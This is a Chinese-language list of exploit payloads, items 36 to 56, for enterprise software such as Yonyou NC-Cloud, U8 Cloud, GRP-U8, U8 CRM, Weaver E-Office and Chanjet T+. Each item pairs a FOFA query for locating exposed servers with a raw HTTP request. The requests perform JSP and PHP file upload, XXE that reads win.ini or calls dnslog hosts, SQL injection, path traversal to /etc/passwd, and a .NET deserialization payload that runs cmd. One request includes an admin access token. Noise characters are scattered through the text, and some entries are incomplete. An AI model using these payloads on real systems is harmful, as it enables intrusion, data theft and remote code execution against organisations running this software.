2 h% Q6 }/ m# W; \5 r  I; j9 BPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.15 X4 {1 P+ [+ Y9 Q1 ?7 q- C( R0 m2 X
Host: 203.25.218.166:8888
7 N' c6 C; D8 @1 m* gUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 v* [. V3 e1 J' i# {" y0 JAccept-Encoding: gzip, deflate
2 p9 |) l% o  @6 CAccept: */*' M% H- y1 s7 j! w3 s+ A9 A& V
Connection: close9 r: |. v( Q) F& |1 d
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
) ^0 N1 }; G4 DContent-Length: 190
( }- O. p; h+ {* G$ U  W6 [4 SContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df03 L9 |6 ~  r9 r
, g+ _. F; ^8 J$ B8 F# _1 j6 |# |+ ]
--fd28cb44e829ed1c197ec3bc71748df00 ?) f  ~$ y; O0 {0 G) W& ~
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"% D# K  u8 g  s
) u5 y( C* Y( o* ~* ~
<%out.println(1111*1111);%>" M' ]) h, V( R" A) x1 u% }' G& ^8 {
--fd28cb44e829ed1c197ec3bc71748df0--& U5 y) T4 \* L2 k$ B6 C1 z

( x& F% [* W8 B1 R2 S" w" J# G( D1 t0 k$ b% L6 w/ S) C
36. 用友NC-Cloud soapFormat XXE6 k3 {. {0 \- A
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"% N, r8 x, L" g( b/ X) @0 `$ L" i
POST /uapws/soapFormat.ajax HTTP/1.12 k% f+ ?2 ^: g+ J9 X- }* d2 z
Host: 192.168.40.130:8989) A6 t5 F/ q( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0; r% r/ b; s8 \* _  u/ w8 B
Content-Length: 263, s7 J2 [5 `$ D/ p- t. H* Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! u' m% M% x( m9 P
Accept-Encoding: gzip, deflate8 [2 ^! ]. W; ]: Z7 ~( t0 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- M9 o8 Y( D  k) \/ DConnection: close% U  l8 k5 x  T$ m8 Y) z  |
Content-Type: application/x-www-form-urlencoded
0 k3 t8 S9 E: W! N4 XUpgrade-Insecure-Requests: 11 |$ P& g. H& v. r* [" i

* w, _% Q1 m0 P: ]msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a' V. q1 [# w3 y; B" O/ m: e

4 _9 }3 v1 e( P5 F- C' K
" _# d1 A" h8 u2 f37. 用友NC-Cloud IUpdateService XXE
% u4 M( Z; x$ P! y9 l. `FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ ^: J+ k0 T/ q( G) \1 j: SPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
1 t) Q6 y% O9 j4 U$ n! T" mHost: 192.168.40.130:8989
5 l: t+ W" z0 N! _8 h* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36: H8 K$ h% O# m6 ^) p3 S( b9 {
Content-Length: 421- {, t; |2 ?2 E5 J3 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; B! W; Z' Y. Q$ U4 n+ T4 I- O
Accept-Encoding: gzip, deflate
# U& o$ C# z' y2 TAccept-Language: zh-CN,zh;q=0.9* m# p' z* y* ~  G
Connection: close
6 q7 Z, {  z* QContent-Type: text/xml;charset=UTF-8
, P1 [/ V9 `# E) R7 SSOAPAction: urn:getResult
; F8 a# ?+ G) G  [8 aUpgrade-Insecure-Requests: 1
1 z  X3 i% b+ W9 z0 ^
8 Y0 h; {3 w: z  Z<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
& |7 L  v( j' f4 X: S6 T: T0 m3 [<soapenv:Header/>$ T' o! Z9 A0 s% L
<soapenv:Body>( p( z$ E; y8 ~; q; a1 `5 {
<iup:getResult>
/ s, X/ Y/ s% _; _$ Q! N<!--type: string-->! @0 S0 w0 Q0 Y4 r$ b6 Y3 p7 Y/ f9 t# I- Y
<iup:string><![CDATA[
3 g, [' ?0 D) J0 Z( F5 V8 W<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
1 g+ Y7 k' O3 P# Y2 t. g& |& u6 Z<xxx/>]]></iup:string>, n4 E+ M* B" P+ N3 e
</iup:getResult>
9 o  ]% [8 k, [( r</soapenv:Body>
. x; G$ O% O& k- x3 \- w</soapenv:Envelope>7 p, |6 i  d- _- C" M& F8 i
+ G4 g) b$ H# D0 x

! @. O1 n: [6 q/ \2 A. K
' T) I( t* ^: R) j: d/ u38. 用友U8 Cloud smartweb2.RPC.d XXE7 `( a* T1 e+ M
FOFA:app="用友-U8-Cloud"1 s/ y& c- g6 U8 J8 e5 V# j
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.10 X- O3 M# n. q- T1 R
Host: 192.168.40.131:8088" E& X( B& h' T/ B2 q5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.258 U( L3 D$ w1 i
Content-Length: 260
3 h& L& Z5 J. C8 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 g. [6 S3 d2 f2 X; @
Accept-Encoding: gzip, deflate
/ _% w9 Q+ h! `* i6 \Accept-Language: zh-CN,zh;q=0.98 u& l6 q* T* k' F
Connection: close
; N$ }  I1 |$ I. d/ nContent-Type: application/x-www-form-urlencoded5 r7 k5 s1 z; `5 g' E1 I! a/ w
; m! h; t3 Z, |: ^
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. i4 ]% b: `# `. `& U
7 b1 Y5 z3 J5 E0 C8 l) i2 s! |. J/ P+ |/ B2 |( u
39. 用友U8 Cloud RegisterServlet SQL注入! q3 c: B/ Q; ?/ A) Z
FOFA:title="u8c"
- `8 n' _: ]# k5 \8 QPOST /servlet/RegisterServlet HTTP/1.14 T9 T8 H6 W+ g* r
Host: 192.168.86.128:8089& Y2 g# ^, `6 v  E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36: @! t' k) l; d
Connection: close- b: x9 V2 i& s
Content-Length: 852 B5 F  [" }' ~1 H
Accept: */*% p  a' r: g  g% d" t
Accept-Language: en7 T+ f, z0 a! Q5 S2 M+ `! y
Content-Type: application/x-www-form-urlencoded
& Z! Z( J/ Y( o, i! |X-Forwarded-For: 127.0.0.1; f2 W: M# p) x+ s; ^6 I
Accept-Encoding: gzip* z2 i: L- c* j0 g4 |

: Q1 O( U" ]) n$ ~1 @  N/ |usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--% v; q" R6 w+ A. Q. `

, h8 n2 s1 {; A* @  T: g% C# K8 n
( c# w8 d# O: N/ T40. 用友U8-Cloud XChangeServlet XXE
  Z1 f% Z9 P) [2 qFOFA:app="用友-U8-Cloud"7 P- a' P* @8 B2 W& l. n0 |
POST /service/XChangeServlet HTTP/1.1
& i. O3 [+ c7 g1 x5 {7 qHost: x.x.x.x
& G" q6 @* D/ iUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 G1 N; S2 G% H" L  a1 y  }3 H& B* AContent-Type: text/xml# h' _! O' B' Q% m6 _+ D
Connection: close1 D, [# e2 }8 w) Q
/ t6 y/ T/ R' w. l0 m
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>+ [& D3 N  Z$ L+ }5 A( \- d

( b% u# c5 _# f5 J6 i! K2 y1 ~: b# j1 l
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入1 g" e9 R' V/ n1 Z% Q
FOFA:app="用友-U8-Cloud"- x% e5 k4 m! h2 C7 ?
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
/ o( \: E' D* v6 ]. q6 ]Host:
3 ~# U5 T& K1 V4 t  eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, i, m/ I! d+ d& JContent-Type: application/json
5 v1 ~4 ^$ R. sAccept-Encoding: gzip
2 \( Z& F7 H) k# t$ ~- ~$ aConnection: close+ z$ V: ^! R, x5 F. j+ ?
6 b; L8 y) T1 G# T$ x

3 y" L$ d3 b+ z" t" Z42. 用友GRP-U8 SmartUpload01 文件上传
$ D/ Z$ K+ `5 t& _FOFA:app="用友-GRP-U8"3 u$ x' s% f8 E: L5 j1 D' P6 |2 A
POST /u8qx/SmartUpload01.jsp HTTP/1.1
, I# d% H) D& J7 H/ fHost: x.x.x.x: g) d0 J2 k( H+ D# R7 Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ I/ J6 E3 U* g+ m/ K7 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
5 h( P% {) m5 V# H
9 v1 e+ Y7 L+ `; L" ~& MPAYLOAD$ }( \- W/ S+ ]6 ~
: U; f7 V4 d' x6 \4 S  P" m
" f8 o; C1 k: X$ j% G
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml* i' b' A6 f: G! B5 X' X7 v" u2 ^. d
" S1 N9 k* p2 D1 {5 A& q' E( f
43. 用友GRP-U8 userInfoWeb SQL注入致RCE2 g2 g0 f8 h# L8 a- E
FOFA:app="用友-GRP-U8"
( Y0 q  |/ B0 R1 n/ s" VPOST /services/userInfoWeb HTTP/1.19 V- W/ [; j$ D
Host: your-ip
; U* b7 R5 Z4 D1 ^, Z0 s( NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) Y7 H( k5 H, s, ^" x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ W9 o  c* X3 mAccept-Encoding: gzip, deflate
8 X8 j* n) ]- Y$ D# aAccept-Language: zh-CN,zh;q=0.9
2 e) U3 _" o3 E9 H: LConnection: close
- v# W. t& Z7 l: K; w9 {SOAPAction:
) D! W4 P2 ^% \% @6 J- ]  @Content-Type: text/xml;charset=UTF-8
: T; |/ T: ^# n9 R' c: L) k8 x7 g
7 @9 B+ T, a9 _& S/ \- D, y3 l<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">7 j. N* M5 T4 [) D
   <soapenv:Header/>: H4 i3 K! ~$ G7 [" r# v
   <soapenv:Body>
3 n! a) z5 ^/ ?* W      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">5 V  d/ ~4 }- P. a
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( Y1 S8 A/ h3 o; v% {$ j: d
      </ser:getUserNameById>3 |9 T+ M( Z1 l8 a
   </soapenv:Body>" r. e2 Y6 ?2 a( S% z& u
</soapenv:Envelope>
* ~5 b2 N4 h3 c- I2 z4 x$ b* J2 ~5 s0 I& n

4 O7 h" Y+ f& L6 q2 t. |9 h4 t& I44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% p: e0 U( \0 R5 U5 i6 A" h( mFOFA:app="用友-GRP-U8"
  X5 a2 W# k% r5 u" eGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
6 g( F, R- v. o) O; UHost: your-ip
/ H6 V1 Q- q7 a4 H) |6 r6 \/ MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.367 ^6 q0 q5 p- T6 p8 j- s6 V! j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: J- X+ ?# @* S' E+ NAccept-Encoding: gzip, deflate( B/ w1 a6 K0 {3 C* _' K" s
Accept-Language: zh-CN,zh;q=0.9
! ~; Q' T/ h( L4 H+ rConnection: close/ G* t) c/ f; X9 @2 ]% O

- E% H, W9 z$ p" S7 M9 t0 m0 E( C9 y4 U$ l% K% E9 f, u
45. 用友GRP-U8 ufgovbank XXE( k; U5 W* Y0 R/ N/ Y
FOFA:app="用友-GRP-U8"
# i2 A7 J. p7 g& o6 S4 T) W: X" a5 OPOST /ufgovbank HTTP/1.1
7 a# @2 T5 N4 y$ v- N8 V& I; ]Host: 192.168.40.130:222
, J* R8 }  R8 [. b' @: |& AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0: A, u" h, k& L; Z0 M; z: e
Connection: close
  ^+ O0 x% O6 b$ CContent-Length: 161
8 |: X1 R4 z! L: \/ K4 W- G, JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ o4 T8 h' ?9 e4 X; uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ U& i+ `# _( q6 S; y, `' \Content-Type: application/x-www-form-urlencoded
( z# j1 W8 R; Y5 lAccept-Encoding: gzip% t$ z' R* l3 h) d" c
6 X5 F; |1 U: \  E) `3 @8 `
reqData=<?xml version="1.0"?>
( f( W; G- `- N0 P2 I3 Z( Q# D<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest1 N1 Q) H3 u( o! N4 f, z
9 p+ ~) i+ G: ^
5 h; L2 @& r, V+ o3 h- n
46. 用友GRP-U8 sqcxIndex.jsp SQL注入- |* n+ G1 P! T4 c
FOFA:app="用友-GRP-U8"
) ^1 k% O* ^4 t' \+ M% t& FGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
+ B, d: C+ @9 eHost: your-ip) z/ b1 F2 u( S& K  m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.361 ]/ z& a" r) ^1 m% Y, c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* X& d; \& p  H9 J) sAccept-Encoding: gzip, deflate' }+ X2 v- ^) ]* f' G6 K
Accept-Language: zh-CN,zh;q=0.94 `/ h1 |8 b/ s1 q
Connection: close
! z4 n4 Q. [9 r
% m; m" \: u- E4 _& U2 j+ B5 Y7 o
- Z3 d4 R1 b3 {7 B- O% a  K47. 用友GRP A++Cloud 政府财务云 任意文件读取9 O, p( N7 `) ]/ Q& I& G7 d
FOFA:body="/pf/portal/login/css/fonts/style.css"
9 q0 x2 w$ u5 j; A8 {GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
  P4 D, n9 s5 W' z, g( EHost: x.x.x.x6 S( L- f- q- O4 F4 A% x% l6 [
Cache-Control: max-age=0- h# ?! d0 S( v- q# ~; X' T
Upgrade-Insecure-Requests: 18 {6 T) q. B# y7 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. N4 C- E3 W1 |* f/ u) V% }) J1 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  M. P8 c/ B+ u& G; A7 m
Accept-Encoding: gzip, deflate, br7 S0 u# I+ H2 F: x
Accept-Language: zh-CN,zh;q=0.9
7 j& A) X+ f0 P8 `. b0 tIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
( W& \& K* d; b% R! b) \" E6 lConnection: close, M) ]1 J4 J5 H

; f/ k7 E! x' @  x& b- U4 [, n3 r( T8 {& A/ b
7 t. A$ N& Z% t( f
48. 用友U8 CRM swfupload 任意文件上传8 v$ U3 G/ d# _" G1 G3 O
FOFA:title="用友U8CRM"! x; t& {1 O( G9 S* M
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
/ j9 j$ {! `- l- w; ?Host: your-ip9 F6 u# R0 U& {. l: Y3 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' I1 D4 \% |7 K8 b, XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ d  [( m$ v  y, q. k( |3 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 s6 l' @) g+ ~! n
Accept-Encoding: gzip, deflate
- k% R4 I; C7 W0 w9 B4 u& W! E# ^; fContent-Type: multipart/form-data;boundary=----269520967239406871642430066855) F0 }* Z; ?/ _4 N
------269520967239406871642430066855+ G6 D: h/ W4 I# G1 E% i# `
Content-Disposition: form-data; name="file"; filename="s.php"7 Q- u7 Y& n0 z2 A1 G  B
1231( y" `% U) a9 h9 ~  i9 d
Content-Type: application/octet-stream
5 t( P3 Y& Y- v) d9 R------269520967239406871642430066855, |, W9 ^7 @6 P( F& L
Content-Disposition: form-data; name="upload"
- t4 d7 ^- U6 ~0 Lupload
0 q% ?9 k( O2 z& B: W5 R------269520967239406871642430066855--. l5 f( z5 _" m6 }, c2 [% N& H

  E; z; {; m: E6 h# T: t- }' ?. z
9 j: V5 N& k0 |5 `5 j" W" V49. 用友U8 CRM系统uploadfile.php接口任意文件上传
1 e" l- l$ Z/ L  r- r' F9 PFOFA:body="用友U8CRM") k$ D% w9 q. m
4 n, O7 w& j9 Y
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
: v8 m, `6 c2 H% X; {Host: x.x.x.x, ]( d1 ~: E2 G+ e' d% d9 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ r0 |% j: b, ~- d2 b! h6 l# fContent-Length: 329
9 r5 X& J8 J1 ~- }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 b0 n1 x: \$ N( ~  ~- h3 O  xAccept-Encoding: gzip, deflate8 a% N" J+ E# Q8 Q7 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( I! }5 ?& n5 @2 x: lConnection: close% E; C  h$ W5 n' ~. j1 a7 M
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
+ t/ J% K* K' x) _7 p/ U# x0 O/ M' w+ d! i4 K; c* o
-----------------------------vvv3wdayqv3yppdxvn3w
; M1 W8 ^- O& [' g4 RContent-Disposition: form-data; name="file"; filename="%s.php "  m4 b/ g4 U: j* T5 F3 @' b
Content-Type: application/octet-stream
# z& V: q7 C9 l* ^* E4 H: f
/ k2 i+ ?0 f- S3 P( Mwersqqmlumloqa
  y6 L9 L( d( u& U-----------------------------vvv3wdayqv3yppdxvn3w
0 C; \! Q: x) w9 {  n' T" H1 uContent-Disposition: form-data; name="upload"- k0 f- O% u7 O9 Z3 `8 \5 k4 p

8 P0 c& ]1 I" ?4 e4 bupload% [* q, j$ m3 ~' g* Z9 g+ [9 C1 v. p
-----------------------------vvv3wdayqv3yppdxvn3w--# @8 _) k/ H3 c; v5 U

' J1 F5 @. p* ?4 L) ~# e% V9 [7 T8 `1 p. z& g
http://x.x.x.x/tmpfile/updB3CB.tmp.php- `5 V, t0 Q0 `8 ~$ O4 C
% z" ]7 a7 ]  Y7 c( [7 _+ i! a" F
50. QDocs Smart School 6.4.1 filterRecords SQL注入0 e; Z) p$ u. c" g9 J
FOFA:body="close closebtnmodal"7 U* F# ?/ N  z' Q& |9 ]6 e
POST /course/filterRecords/ HTTP/1.1
2 k8 @' H1 }. _& R: |4 eHost: x.x.x.x
2 t3 y  a; r! WUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 O" y6 \, E5 KConnection: close; @) i5 m6 x9 H' J5 T
Content-Length: 224; B- X" R+ N7 M6 o5 N2 Y! Q. e
Accept: */*! q9 b1 ^& f2 @$ Q+ U
Accept-Language: en. r4 Z; p$ z5 Q! L1 S
Content-Type: application/x-www-form-urlencoded  w' u: \$ U' D# k* F  E
Accept-Encoding: gzip/ T* ?9 o7 s4 J

, ~6 N" O# W: h$ ?; M# S! ]- q/ Esearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
0 J! G& i! E0 K$ ^+ T' k' e
; ~* Z. P  y9 w0 l
8 m- S" C" w/ Y' j51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
# P! x' P+ ]; o: C* mFOFA:app="云时空社会化商业ERP系统"' ?) x: H* P2 h* `. Q1 \7 s1 i' i
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; i! y: ^  R4 T! b  K
Host: your-ip
) Q3 u3 \" S6 v$ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36/ @- Q* B( j4 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# i. \; ^8 q4 R- L  m* h. mAccept-Encoding: gzip, deflate( C& h3 s) |# Y0 f1 d/ q
Accept-Language: zh-CN,zh;q=0.9
. }: z) o. ], u4 K) dConnection: close. X- _1 f1 H/ ]2 t( ~( E% b& I3 f& l
. K( A- L7 Q6 t/ R$ a2 N
' [7 S0 `- P* ~& _8 Q9 J
52. 泛微E-Office json_common.php sql注入5 w" h! i. L, q2 p
FOFA:app="泛微-EOffice"7 I( }& @1 [9 \  o& N
POST /building/json_common.php HTTP/1.1
0 N4 j3 E6 o# Y3 w/ {  v! R  ~Host: 192.168.86.128:8097) A( M8 Z5 e, L7 T3 r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) @5 r8 o6 f( Z3 L% cConnection: close  k5 i2 v) \1 `
Content-Length: 87
3 B1 D0 L4 O1 n! {5 r$ n8 ^Accept: */*3 Y' f; W7 ^8 M; S. a8 z3 w# N: y, S, x
Accept-Language: en, U* J1 B! A% \7 r9 E
Content-Type: application/x-www-form-urlencoded
# W  T" U. h; S, w# EAccept-Encoding: gzip
# ]) {# O( Z* m" f9 J$ b4 n8 h' v, J2 H: _- a5 M8 T. @
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
- X' ]0 `, q+ W5 r6 P- v3 B  J4 U. o! V5 y0 C) N8 h2 O; v
6 l! {0 I; e, C- R' L9 v$ x+ F
53. 迪普 DPTech VPN Service 任意文件上传# j" b. p0 b( ?  h9 @( X
FOFA:app="DPtech-SSLVPN"8 C! |3 ?+ R( K2 ^2 T6 r& v! }
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+ I6 b$ j1 A$ |

0 h% g) Q. R- w% n% W) T" j* I# R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行7 B! k2 _- z; P  G, g1 x
FOFA:app="畅捷通-TPlus"' p0 L. u# `, p$ t9 ]
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件+ V. _! U3 d- z% A. X5 R7 e$ y& ~
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
/ l& e; s7 T8 A  X$ B7 q# t+ C9 j
2 _: O; B4 s1 X8 X; Q) Q; _: E5 j8 a6 I% E! M
完整数据包
3 s; r  c4 b0 i* ^POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1( m3 d6 ~9 q' a
Host: x.x.x.x3 q% ?2 |2 g: ~, e! C1 M
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
4 |# w5 V' R" o3 D4 c4 AContent-Length: 593
/ M4 G  j" k% n$ Z6 r& h, C
0 c& c3 T  p+ d3 B0 ~{8 X' T3 c! \: H$ f" |& f$ z8 a$ d
"storeID":{" r  `$ s0 Q: z; Z, x$ a4 q
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
$ \5 A8 L. `) ~ "MethodName":"Start",
" Z  Q- p& j# i) q2 M  "ObjectInstance":{* A6 t0 O7 g1 g
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 m# ~) ^) Q1 i2 S  z: D: @2 c    "StartInfo":{
4 L" N$ O* ^4 G) o. L5 m3 t& Q   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
8 ]' c( w7 u" s+ d  i    "FileName":"cmd",4 F. j  N( k, e3 a5 p( }) N2 Q
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 y- H, {, |7 A5 |
    }; E" O8 h. @$ K' \3 [" G
  }6 a' h: i: r  I& @) p
  }  Y, X+ r  ?, ^: R& s* Q7 u. H: R
}
. ^8 e& K. K& X- E" W. _8 P% h
2 h* E9 e5 p0 O( j7 T/ f+ r4 l7 I5 y, j4 i" U4 k
第二步,访问如下url
8 b+ S  f9 D" C. I1 w/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt: A' L; q, R8 q

9 D0 m" H: _% A1 t. v2 J
6 V+ V2 h9 \; u2 R55. 畅捷通T+ getdecallusers信息泄露+ k* e: b9 o% J3 @" H0 t1 D  H
FOFA:app="畅捷通-TPlus"
' t" a4 t# x: D* T0 ^- B8 i第一步,通过
1 i6 w( D% d3 I6 B; N/ O, K9 s1 {/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
5 t# a  R9 f. T0 z  g% q第二步,利用获取到的Cookie请求. Z! P+ F' T, c! I% e) S
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
' X8 `/ [+ g. U- Z: a  `# C% t
' }) ^+ t0 z! z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# k& N8 R: }$ k% X& n9 M& ~8 h# s
FOFA: app="畅捷通-TPlus"
